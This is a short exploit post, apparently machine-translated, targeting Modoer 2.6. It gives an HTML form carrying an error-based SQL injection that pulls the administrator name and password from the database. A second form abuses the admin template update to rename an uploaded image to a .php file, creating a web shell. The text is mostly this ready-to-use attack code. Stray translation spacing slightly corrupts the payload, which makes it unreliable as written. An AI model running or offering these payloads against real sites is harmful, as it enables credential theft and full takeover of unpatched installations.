Modoer comments system 2.6 0day (injection + background rename using shell)

Cause: He promised that his website was hacked. In the middle of the night, he asked me to analyze and give him an exp. The official website has released a patch and there is no exp on the Internet. We compared the patch vulnerability that appeared in the datacall_class.php file. If you are interested, let us know. Injection:

<Form action = "http://www.day5.com/index.php? Act = ajax & do = datacall & in_ajax = 1 & m = index & op = get_datacall "method =" post "> <input type =" text "name =" datacallname "value = "_" size = "80"> <input type = "hidden" name = "sid" value = "1/**/AND /** /(select/**/1/**/from/**/(select count (*), concat (SELECT concat (adminname, 0x7c, password) FROM modoer_admin limit 0, 1), floor (rand (0) * 2 )) x/**/from/**/information_schema.tables/**/group/**/by/**/x)) # "/> <input type =" hidden "name =" name "value =" b4dboy "/> <input type =" submit "value =" exp "/> </form>

 

Note: The above datacallname value is encoded instead of garbled characters. Add a self-discovered background file and rename it to shell.

<form method="post" action="http://www.day5.com/admin.php?module=&act=template&op=update">    path:<input type="text" name="root_dir" value="uploads/bcastr/" size="40" /><br />    filename:<input type="text" name="fielnames[1][filename]" value="78_1348754079.jpg" size="40" /><br />    newfilename:<input type="text" name="fielnames[1][newfilename]" value="b4dboy.php" size="40" /><br />    <input type="submit" name="dosubmit" value="exp" /></form>